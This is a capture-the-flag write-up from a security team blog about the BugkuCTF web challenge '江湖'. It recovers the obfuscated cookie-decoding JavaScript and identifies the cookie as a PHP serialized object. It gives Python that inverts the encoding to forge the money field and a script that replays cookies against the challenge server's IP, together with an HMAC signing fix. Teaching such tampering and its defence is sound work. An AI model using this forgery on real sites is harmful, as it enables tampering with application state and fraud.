BugkuCTF 江湖 - CDUSEC internal blog

BugkuCTF 江湖

Category: WEB


Posted by 降龙

After entering the challenge and playing around for a while, I found that all four attributes have to be trained to the maximum and the 如来神掌 (Buddha's Palm) bought from the shop before 蒙老魔 (Meng Laomo) can be defeated.

As shown in the figure below.

(figure: 1.png)

So how is this challenge solved?

(figure: 2.png)

First, notice that every time you train (练功) or earn money (赚钱) a new Cookie is issued. The obvious guess is that the challenge keeps the training state in the Cookie itself, so I trained 4 times and tried to find a pattern in the values.

The base64-decoded Cookie is not plaintext, however. Converting it to hex and comparing the 4 training sessions does show some regularity: certain bytes change in a predictable way. In the dump below, the values a byte took across the sessions are listed in brackets; "train" marks the byte that moved after training and "earn money" the byte that moved after earning money.


\x51 \x3c \x3b \x3c \x2c \x6a \x7b \x71
\x63 \x70 \x2e \x36 \x39 \x38 \x4e \x8d
\x6b \x52 \x50 \x56 \x30 \x6e \x6f \x7d
\x6a \x69 \x73 \x6c \x6d \x30 \x23 \x73
\x1e \x1f \x18 [\x19 | \x1e | \x1f | \x1c] \x14 \x67 \x59 \x62 \x67   train
\x14 \x0c \x58 \x41 \x43 \x5e \x5f \x04
\x75 \x45 \x0e \x09 \x0d [\x0e | \x0f | \x08 | \x09] \x0e \x77 \x4d   train
\x7a \x07 \x7e \x16 \x52 \x51 \x56 \x59
\x35 \x68 \x01 \x31 \x00 \x06 \x71 [\x7e | \x7f | \x7c | \x7d] \x79   train
\x3f \x76 \x76 \x0a \x66 \x20 \x3d \x36
\x39 \x3e \x3f \x74 \x15 \x25 \x14 \x68
\x62 [\x63 | \x64 | \x65 | \x66] \x1f \x2f \x66 \x67 \x62 \x76 \x21   train
\x09 \x13 \x13 \x19 \x14 \x0f \x40 \x27
\x07 \x28 \x52 \x2f \x11 \x28 \x57 \x52
\x56 \x02 \x19 \x03 \x1b \x0d \x0e \x05
\x5c \x47 \x17 \x44 \x4a \x3f \x05 \x3c
\xc1 \xc4 \xa6 \xee \xe9 \xf6 \xeb \x07
\xe1 \xfe \xa6 \xcd \xe7 \xb0 \xba \xcf
\xe9 \xd0 \xac \xd0 \xb8 \x11 \xf1 \xf8
\xf5 \xff \xee \xb2 \xdf \xef \xda \xa4
\x9d \xd7 \x9c \x99 \xe4 \x8c \xd3 \xdf
\xd0 \xd9 \xd1 \x8e \x93 \xc3 \xee
\x97 [\x96 | \x95 | \x94 | \x93] \x88 \x88 \xf7 \xcd \x88 \x82 \x88 \x90   earn money
\xd4 \xca \xd3 \xcb \x90 \xfb \xcb \x82
\xf5 \xfe \xea \xf4 \xee \x81 \x41



Then I took another look at the shop.

(figure: 3.png)

Money really is king. So I changed the money byte to 00; by my calculation that should have given 15000... but that is not what happened. After the change, the Cookie that came back had nothing in common with the one I sent, so I had clearly modified the wrong thing.


Afterwards I traced through the JS that runs when you fight 蒙老魔 and, out of layer upon layer of obfuscation, recovered the following JS code:


p = '7 s(t){5 m=t+"=";5 8=9.cookie.n(\';\');o(5 i=0;i<8.d;i++){5 c=8[i].trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(\';\');5 e="";o(i=0;i<8.d;i++){u(-1<8[i].v("A")){e=8[i+1].n(":")[2]}}e=e.B(\'"\',"").B(\'"\',"");9.write(\'<img id="f-1" g="h/1-1.k">\');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("{"+md5(e)+"}")},5000)}'
a = []
c = 38
k = '|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|decode_create|base|temp_name|mingwen|flag|replace'.split('|')
e = 0
r = {}
e = function(c) {
    return (c < 62 ? '': e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if ('0'.replace(0, e) == 0) {
    while (c--) r[e(c)] = k[c];
    k = [function(e) {
        return r[e] || e
    }];
    e = function() {
        return '[57-9abd-hj-zAB]'
    };
    c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
Final code:



function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}
function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}
function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if ( - 1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    },
    1000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    },
    2000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    },
    3000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/6.png"
    },
    4000);
    setTimeout(function() {
        alert("{" + md5(key) + "}")
    },
    5000)
}
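The block before "Final code" is the body of the packer's unpacking routine with its arguments (the packed program p and the keyword table k) inlined: e(c) turns an index into a base-62 symbol, r maps each symbol back to its keyword, and one regex pass substitutes whole-word tokens. The Python below is an added re-implementation of that routine, not code from the writeup. It takes the p string and k table exactly as quoted above and produces the final code; it generalizes slightly by matching every whole word (`\b\w+\b`, the packer's generic path) instead of the page-specific character class `[57-9abd-hj-zAB]`, which gives the same result here because the two tokens left out of that class (`c`, `i`) have empty keyword slots.

```python
import re

# The packed program (p) and keyword table (k) exactly as the writeup quotes
# them; the JS-level \' escapes have been resolved so this is the raw string.
PACKED = (
    """7 s(t){5 m=t+"=";5 8=9.cookie.n(';');o(5 i=0;i<8.d;i++){5 c=8[i].trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}"""
    """7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}"""
    """7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(';');5 e="";o(i=0;i<8.d;i++){u(-1<8[i].v("A")){e=8[i+1].n(":")[2]}}e=e.B('"',"").B('"',"");"""
    """9.write('<img id="f-1" g="h/1-1.k">');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("{"+md5(e)+"}")},5000)}"""
)
KEYWORDS = (
    "|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|"
    "getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|"
    "decode_create|base|temp_name|mingwen|flag|replace"
).split("|")


def encode_symbol(c: int) -> str:
    """Port of the packer's e(c): keyword index -> base-62 symbol.
    0..9 -> '0'..'9', 10..35 -> 'a'..'z', 36..61 -> 'A'..'Z', larger
    indices get a recursive prefix (62 -> '10')."""
    prefix = "" if c < 62 else encode_symbol(c // 62)
    c %= 62
    if c > 35:
        return prefix + chr(c + 29)            # 36..61 -> 'A'..'Z'
    if c < 10:
        return prefix + str(c)
    return prefix + chr(ord("a") + c - 10)     # 10..35 -> 'a'..'z'


def unpack(packed: str, keywords: list) -> str:
    """Rebuild the symbol -> keyword table and substitute every whole-word token
    in one pass. Empty keyword slots (indices 0-4, 6, 12 = 'c', 18 = 'i') mean
    the token is its own name and is left untouched."""
    table = {encode_symbol(i): w for i, w in enumerate(keywords) if w}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), packed)


if __name__ == "__main__":
    # Prints the minified form of the "Final code" shown in the writeup.
    print(unpack(PACKED, KEYWORDS))
```

Whitespace is not restored by the packer, so the output is the one-line form of the three functions; pretty-printing it gives the listing above.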



For debugging I fed in one of the Cookies the site had generated; after it passes through decode_create() it comes out as:


O:5:"human":10:{s:8:"xueliang";i:18000;s:5:"neili";i:18000;s:5:"lidao";i:3000;s:6:"dingli";i:3000;s:7:"waigong";i:1;s:7:"neigong";i:1;s:7:"jingyan";i:1;s:6:"yelian";i:1;s:5:"money";i:100;s:4:"flag";s:9:"827949417";}


This was decoded from a Cookie issued after I had already learned the 如来神掌. It is clearly the serialized string of a PHP object, and our flag should be the md5 of the value stored in its flag property.


The intended solution is to forge a cookie with money set to 140000 and then defeat 蒙老魔 the regular way.

Reversing decode_create() gives an encoding function for the serialized string; change the amount, re-encode it into a forged cookie, and the flag follows.
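To make that route concrete, the following is an added Python example (not the writeup's code) that ports decode_create() from the recovered JS, builds its inverse, and reads and rewrites the integer money field of the PHP-serialized object quoted above. It then shows the fix a defender would apply to this kind of state cookie: the per-byte XOR and subtraction only hide the object, they do not authenticate it, so an HMAC tag over the serialized state is added and a rewritten field is rejected on verification. The serialized string and the 12-character cookie prefix are taken from the writeup; the names encode_create, sign_state, verify_state and the key are assumptions of this example.

```python
import base64
import hashlib
import hmac
import re

# Serialized "human" object exactly as the writeup shows it after decoding a cookie.
SERIALIZED = (
    'O:5:"human":10:{s:8:"xueliang";i:18000;s:5:"neili";i:18000;s:5:"lidao";i:3000;'
    's:6:"dingli";i:3000;s:7:"waigong";i:1;s:7:"neigong";i:1;s:7:"jingyan";i:1;'
    's:6:"yelian";i:1;s:5:"money";i:100;s:4:"flag";s:9:"827949417";}'
)

# First 12 base64 characters (9 bytes) of the cookie quoted in the writeup's script.
PAGE_COOKIE_PREFIX = "UTw7PCxqe3Fj"


def decode_create(cookie_b64: str) -> str:
    """Port of the page's decode_create(): base64-decode, XOR each byte with its
    index, then subtract (index % 10) + 2."""
    raw = base64.b64decode(cookie_b64)
    return "".join(chr((b ^ i) - ((i % 10) + 2)) for i, b in enumerate(raw))


def encode_create(plain: str) -> str:
    """Inverse of decode_create (assumed name): add (index % 10) + 2, XOR with the
    index, base64-encode. Every intermediate value must fit in one byte, which
    holds for ASCII input shorter than 256 characters (the page's cookie is
    about 190 bytes)."""
    raw = bytearray()
    for i, ch in enumerate(plain):
        v = (ord(ch) + (i % 10) + 2) ^ i
        if not 0 <= v < 256:
            raise ValueError(f"byte {i} of the transform does not fit in 8 bits")
        raw.append(v)
    return base64.b64encode(bytes(raw)).decode("ascii")


def get_int_field(serialized: str, name: str) -> int:
    """Read an integer property (s:len:"name";i:N;) of a PHP-serialized object."""
    m = re.search(rf's:{len(name)}:"{re.escape(name)}";i:(-?\d+);', serialized)
    if m is None:
        raise KeyError(name)
    return int(m.group(1))


def set_int_field(serialized: str, name: str, value: int) -> str:
    """Rewrite an integer property. PHP integers carry no length prefix, so
    nothing else in the string has to change."""
    pattern = rf'(s:{len(name)}:"{re.escape(name)}";i:)-?\d+;'
    new, n = re.subn(pattern, lambda m: f"{m.group(1)}{value};", serialized)
    if n != 1:
        raise KeyError(name)
    return new


# Hypothetical fix (not part of the challenge): the transform hides the state
# but does not authenticate it. A keyed MAC over the serialized object makes any
# edit detectable, whatever the attacker knows about the encoding.

def sign_state(serialized: str, key: bytes) -> str:
    tag = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    return encode_create(serialized) + "." + tag   # '.' never occurs in base64


def verify_state(cookie: str, key: bytes):
    """Return the serialized state if its tag checks out, otherwise None."""
    body, _, tag = cookie.rpartition(".")
    serialized = decode_create(body)
    expected = hmac.new(key, serialized.encode(), hashlib.sha256).hexdigest()
    return serialized if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    print(decode_create(PAGE_COOKIE_PREFIX))                              # O:5:"huma
    forged = set_int_field(SERIALIZED, "money", 140000)
    print(get_int_field(decode_create(encode_create(forged)), "money"))   # 140000
    key = b"constructed-demo-key"                                         # constructed
    good = sign_state(SERIALIZED, key)
    print(verify_state(good, key) == SERIALIZED)                          # True
    bad = encode_create(forged) + "." + good.rpartition(".")[2]
    print(verify_state(bad, key))                                         # None
```

The money rewrite is easy precisely because PHP's `i:` values have no length prefix; string fields (`s:9:"827949417"`) would also need their length updated. The round trip through encode_create and decode_create reproduces the input byte for byte, which is what makes the forged-cookie route work; the signed variant fails verification as soon as one field differs.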


I didn't actually do it that way, though... I was too sleepy last night, so I wrote a script to farm silver instead. It farmed up to 140000, I got the flag when I woke up in the morning, and took first blood. Sweet.

Lazy man's EXP:

# -*- coding: UTF-8 -*-
import re
import sys

import requests


def txt_wrap_by(start_str, end, html):
    # Return the text between start_str and end, or None if either is missing.
    start = html.find(start_str)
    if start >= 0:
        start += len(start_str)
        end = html.find(end, start)
        if end >= 0:
            return html[start:end].strip()
    return None


url = 'http://123.206.31.85:1616/wulin.php?action=map&n=4'      # map action the loop repeats
url_mon = 'http://123.206.31.85:1616/wulin.php?action=map&n=1'  # page whose HTML shows the current money
coo = 'UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHxwUZ1liZxQMWEFDXl8EdUUOCQkOd016B34WUlFWWTVoATEABn15P3Z2CmYgPTY5Pj90FSUUaGYfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo/BTzBxKbu6fbrB%2bH%2bps3nsLrP6dCs0LgR8fj1/%2b6y3%2b/apJ3XnJnkjNPf0NnRjpPD7u%2bIiPfNiIKIkNTK08uQ%2b8uC9f7q9O6BQQ%3d%3d'  # starting cookie from the browser
pre_coo = ''

# Every request issues a fresh "user" cookie; keep replaying the newest one and
# read the balance off the map page until it passes 140000 (or the cookie stops changing).
while coo != pre_coo:
    cookie = dict(user=coo)
    res = requests.get(url, cookies=cookie)
    pre_coo = coo
    coo = txt_wrap_by('user=', ';', res.headers['Set-Cookie'])
    cookie = dict(user=coo)
    res = requests.get(url_mon, cookies=cookie)
    money = re.findall(r"金钱:(.+?)两", res.text)[0]
    print(int(money))
    if int(money) > 140000:
        print('Now-cookie: ' + coo)
        print('Pre-Cookie: ' + pre_coo)
        sys.exit()
(figure: 4.png)


Tags: code audit, Python

Copyright: unless otherwise noted, all articles here are original work by 降龙; please keep the source link when reposting.

Link: BugkuCTF 江湖 - http://cdusec.happyhacking.top/?post=73